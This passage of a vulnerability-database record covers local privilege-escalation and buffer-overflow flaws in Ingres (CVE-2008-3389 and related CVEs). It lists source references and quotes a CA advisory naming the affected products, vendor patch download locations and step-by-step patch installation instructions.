"db": "BID",
"id": "30512",
"trust": 1.9
},
{
"db": "SECUNIA",
"id": "31398",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "31357",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2008-2313",
"trust": 1.6
},
{
"db": "VUPEN",
"id": "ADV-2008-2292",
"trust": 1.6
},
{
"db": "SECTRACK",
"id": "1020615",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004693",
"trust": 0.8
},
{
"db": "IDEFENSE",
"id": "20080801 INGRES DATABASE FOR LINUX LIBBECOMPAT STACK BASED BUFFER OVERFLOW VULNERABILITY",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20080806 CA PRODUCTS THAT EMBED INGRES MULTIPLE VULNERABILITIES",
"trust": 0.6
},
{
"db": "XF",
"id": "44179",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "68785",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68897",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68872",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "68816",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "PACKETSTORM",
"id": "68785"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"id": "VAR-200808-0315",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.12878788
},
"last_update_date": "2025-04-10T22:56:59.141000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "contentID=181989",
"trust": 0.8,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=181989"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.ingres.com/support/security-alert-080108.php"
},
{
"trust": 2.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=732"
},
{
"trust": 2.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=181989"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/30512"
},
{
"trust": 1.6,
"url": "http://securitytracker.com/id?1020615"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31398"
},
{
"trust": 1.6,
"url": "http://secunia.com/advisories/31357"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2008/2313"
},
{
"trust": 1.0,
"url": "http://www.securityfocus.com/archive/1/495177/100/0/threaded"
},
{
"trust": 1.0,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/44179"
},
{
"trust": 1.0,
"url": "http://www.vupen.com/english/advisories/2008/2292"
},
{
"trust": 0.9,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3389"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-3389"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/44179"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/archive/1/archive/1/495177/100/0/threaded"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/2313"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2008/2292"
},
{
"trust": 0.5,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=733"
},
{
"trust": 0.5,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=731"
},
{
"trust": 0.3,
"url": "http://www.ingres.com/"
},
{
"trust": 0.3,
"url": "/archive/1/495177"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3389"
},
{
"trust": 0.2,
"url": "http://secunia.com/hardcore_disassembler_and_reverse_engineer/"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.2,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.2,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/advisories/31357/"
},
{
"trust": 0.2,
"url": "http://corporate.secunia.com/about_secunia/64/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/),"
},
{
"trust": 0.1,
"url": "http://ingres.com/downloads/prod-cert-download.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/intelligence/vulnerabilities/"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/methodology/vulnerability/vcp.php"
},
{
"trust": 0.1,
"url": "http://labs.idefense.com/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7126/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14592/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5912/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/31398/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19467/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7129/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14437/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5904/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14602/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19468/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5582/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14596/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5905/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/5584/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1684/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1683/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14589/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7120/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/19466/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/7114/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/312/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3357"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/contact/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/solndtls?aparno=ro01277\u0026os=hp\u0026actionid=3"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3356"
},
{
"trust": 0.1,
"url": "http://support.ca.com/"
},
{
"trust": 0.1,
"url": "https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentid=177782"
},
{
"trust": 0.1,
"url": "http://support.ca.com."
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/privacy/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-3357"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-3356"
},
{
"trust": 0.1,
"url": "http://osvdb.org/"
},
{
"trust": 0.1,
"url": "http://www.ca.com/us/legal/"
},
{
"trust": 0.1,
"url": "http://servicedesk.ingres.com/caisd/pdmweb.ingres?op=show_detail+persid=kd:416012+htmpl=kt_document_view.htmpl"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14574/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14576/"
}
],
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "PACKETSTORM",
"id": "68785"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "30512"
},
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"db": "PACKETSTORM",
"id": "68785"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68872"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-01T00:00:00",
"db": "BID",
"id": "30512"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"date": "2008-08-04T19:10:47",
"db": "PACKETSTORM",
"id": "68785"
},
{
"date": "2008-08-08T18:43:59",
"db": "PACKETSTORM",
"id": "68897"
},
{
"date": "2008-08-06T21:42:18",
"db": "PACKETSTORM",
"id": "68872"
},
{
"date": "2008-08-04T23:14:27",
"db": "PACKETSTORM",
"id": "68816"
},
{
"date": "2008-08-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"date": "2008-08-05T19:41:00",
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-08-06T20:26:00",
"db": "BID",
"id": "30512"
},
{
"date": "2012-09-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2008-004693"
},
{
"date": "2008-09-11T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200808-050"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2008-3389"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "BID",
"id": "30512"
},
{
"db": "PACKETSTORM",
"id": "68785"
},
{
"db": "PACKETSTORM",
"id": "68897"
},
{
"db": "PACKETSTORM",
"id": "68816"
},
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linux Such as above Ingres Vulnerable to stack-based buffer overflow",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2008-004693"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200808-050"
}
],
"trust": 0.6
}
}
VAR-200808-0319
Vulnerability from variot - Updated: 2025-04-10 22:56Untrusted search path vulnerability in ingvalidpw in Ingres 2.6, Ingres 2006 release 1 (aka 9.0.4), and Ingres 2006 release 2 (aka 9.1.0) on Linux and HP-UX allows local users to gain privileges via a crafted shared library, related to a "pointer overwrite vulnerability.". Ingres Database is prone to multiple local vulnerabilities: - Multiple local privilege-escalation vulnerabilities - A vulnerability that may allow attackers to overwrite arbitrary files. Local attackers can exploit these issues to gain elevated privileges on the affected computer, execute arbitrary code with superuser privileges, and overwrite arbitrary files owned by 'Ingres' user. Title: CA Products That Embed Ingres Multiple Vulnerabilities
CA Advisory Date: 2008-08-01
Reported By: iDefense Labs
Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition.
Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation. The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to potentially set the user and/or group ownership of a verifydb log file to be Ingres allowing read/write permissions to both. The third vulnerability, CVE-2008-3389, allows an unauthenticated attacker to obtain ingres user privileges. However, when combined with the unsecured directory privileges vulnerability (CVE–2008-3357), root privileges can be obtained.
Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation.
Severity: CA has given these vulnerabilities a High risk rating.
Affected Products: Admin r8.1 SP2 Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3 CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 CleverPath Aion BPM r10.1, r10.2 EEM 8.1, 8.2, 8.2.1 eTrust Audit/SCC 8.0 sp2 Identity Manager r12 NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11 Unicenter Asset Management r11.1, r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r2.2, r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2 Unicenter Software Delivery r11.1, r11.2 Unicenter Workload Control Center r11
Affected Platforms: 1. Ingres verifydb file create permission override (CVE-2008-3356) This vulnerability impacts all platforms except Windows. 2. Ingres un-secure directory privileges with utility ingvalidpw (CVE - 2008-3357) This vulnerability impacts only Linux and HP platforms. 3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389) This vulnerability impacts only Linux and HP platforms.
Status and Recommendation: The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3
Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information.
For these products: Admin r8.1 SP2 CA ARCserve Backup for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11
Apply the update below that is listed for your platform (note that URLs may wrap):
AIX [3.0.3 (r64.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12833-r64-us5.tar.z
HP-UX Itanium [3.0.3 (i64.hpu/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12831-i64-hpu.tar.z
HP-UX RISC [3.0.3 (hp2.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12830-hp2-us5.tar.z
Linux AMD [3.0.3 (a64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12835-a64-lnx.tar.z
Linux Intel 32bit [3.0.3 (int.lnx/103)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.103.12836-int-lnx.tar.z
Linux Itanium [3.0.3 (i64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12838-i64-lnx.tar.z
Solaris SPARC [3.0.3 (su9.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12834-su9-us5.tar.z
Solaris x64/x86 [3.0.3 (a64.sol/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.211.12832-a64-sol.tar.z
Ingres r3 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ‘XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ‘-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ‘ingstart' utility: ingstart
For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2
Apply the build below that is listed for your platform (note that URLs may wrap):
AIX ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12833-r64-us5.tar
HP-UX Itanium ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12831-i64-hpu.tar
HP-UX RISC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12830-hp2-us5.tar
Linux AMD EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-x86_64.tar.gz
Linux AMD II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-x86_64.tgz
Linux Intel EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-EI-linux-i386.tgz
Linux Intel II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-103-pc-linux-i386.tgz
Linux Itanium EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-EI-linux-ia64.tar.gz
Linux Itanium II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3-211-linux-ia64.tgz
Solaris SPARC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12834-su9-us5.tar
Solaris x64/x86 ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3.211.12832-a64-sol.tar
Ingres r3 Build Install Steps (August 1, 2008)
Important: Prior to installing the build, a full operating system backup of the $II_SYSTEM/ingres directory on Unix/Linux and %II_SYSTEM%\ingres directory on Windows must be taken with Ingres completely shut down. Also, a backup of any other DATA locations that you may have must be taken, again with Ingres shut down. In case there is a problem with the update install, this allows Ingres to be restored from the backup.
Unix: 1. Log in to the system as the installation owner and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres home directory 2. PATH must include $II_SYSTEM/ingres/bin and $II_SYSTEM/ingres/utility directories 3. Add $II_SYSTEM/ingres/lib to the shared library path 4. Set TERM to ‘vt100' and TERM_INGRES to ‘vt100fx' 2. Copy the downloaded update file to the /tmp directory and uncompress 3. Read in the update file with the following commands: umask 022 tar xf [update_file] This creates a directory containing the distribution and other files. 4. Stop all applications that may be connected to or using any of the files in the Ingres instance. 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. Also, copy the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to ensure that the configuration can be restored. 7. From the root directory of the Ingres installation ($II_SYSTEM/ingres), run the following command: tar xf /tmp//ingres.tar install 8. Run the following command: install/ingbuild 9. The initial install screen appears. 10. In the Distribution medium enter the full path to the ‘ingres.tar' file (including the file) (See step 4). 11. Choose PackageInstall from the list of installation options and then choose ‘Stand alone DBMS Server' from the list of packages. Then choose ExpressInstall. 12. Choose Yes in the pop-up screen and press Enter key. The install utility verifies that each component was transferred properly from the distribution medium. When this is finished (without errors), another pop-up screen for setting up the components comes up. 13. Select Yes and press Enter key to go to the Setup program. 14. Once the installation is complete, check the $II_SYSTEM/ingres/files/install.log for any errors. Also, check the $II_SYSTEM/ingres/version.rel file to verify the new build is referenced; this should show 3.0.3 for the build. 15. If there are no errors, then restore the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files from the copies made in step 6 to replace the existing files. 16. Start Ingres using the ‘ingstart' utility: ingstart 17. Upgrade the databases in the installation to the new release level: upgradedb -all
Linux: 1. Log on to the machine as ‘root'. 2. Copy the downloaded build update file and to a previously chosen directory and uncompress. 3. Read in the update file with the following command: tar xf [update file] This creates a directory containing rpm packages for all of the Ingres tools. 4. Shut down any non-Ingres application(s) that may be connected to or using any of the files in the specified Ingres instance. 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. 7. From the directory that was created in step 3, install the update rpms with the following command: rpm –Uvh *.rpm If the following error is seen for either the ‘ca-ingres-documentation-3.0.3-103', the ‘ca-ingres-CATOSL-3.0.3-103' or the ‘ca-cs-utils-11.0.04348-0000' (or all of them) packages, remove them from the directory containing the rpms and re-run the above command: package is already installed 8. If the installation finishes successfully, then log on as ‘ingres' to the machine and start Ingres using the ‘ingstart' utility: ingstart 9. Upgrade ‘mdb' database with the following command: upgradedb -all
For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0
Apply the update below that is listed for your platform (note that URLs may wrap):
AIX 32bit [2.6/xxxx (rs4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z
AIX 64bit [2.6/xxxx (r64.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z
HP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3 https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&actionID=3
HP-UX Itanium [2.6/xxxx (i64.hpu/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z
HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z
HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z
HP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z
HP Tru64 UNIX [2.6/xxxx (axp.osf/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z
Linux AMD64 [2.6/xxxx (a64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z
Linux Intel 32bit [2.6/xxxx (int.lnx/00)LFS] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z
Linux Itanium [2.6/xxxx (i64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z
Linux S/390 [2.6/xxxx (ibm.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z
Solaris SPARC 32bit [2.6/xxxx (su4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z
Solaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z
Solaris SPARC 64bit [2.6/xxxx (su9.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z
Ingres 2.6 Vulnerability Updates Install Steps (August 1, 2008)
Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ‘XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ‘ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ‘-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ‘ingstart' utility: ingstart
How to determine if you are affected:
For these products: Admin r8.1 SP2 ARCserve for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211)
Notes: 1. You would need to install the Ingres build instead of the patch if either of the following is true: 1. If the Ingres release for your platform is not 3.0.3 in the release identifier or 2. The Ingres release is 3.0.3 but the build level is not 103 for Linux and 211 for all the Unix platforms. If either of the above is true then download and apply the latest build for your operating system(s). 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support.
For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2
The maintenance updates are provided for the latest r3 builds supported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX platforms). If the build embedded is earlier than 3.0.3, it has to be upgraded to 3.0.3 to fix the vulnerabilities.
The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel
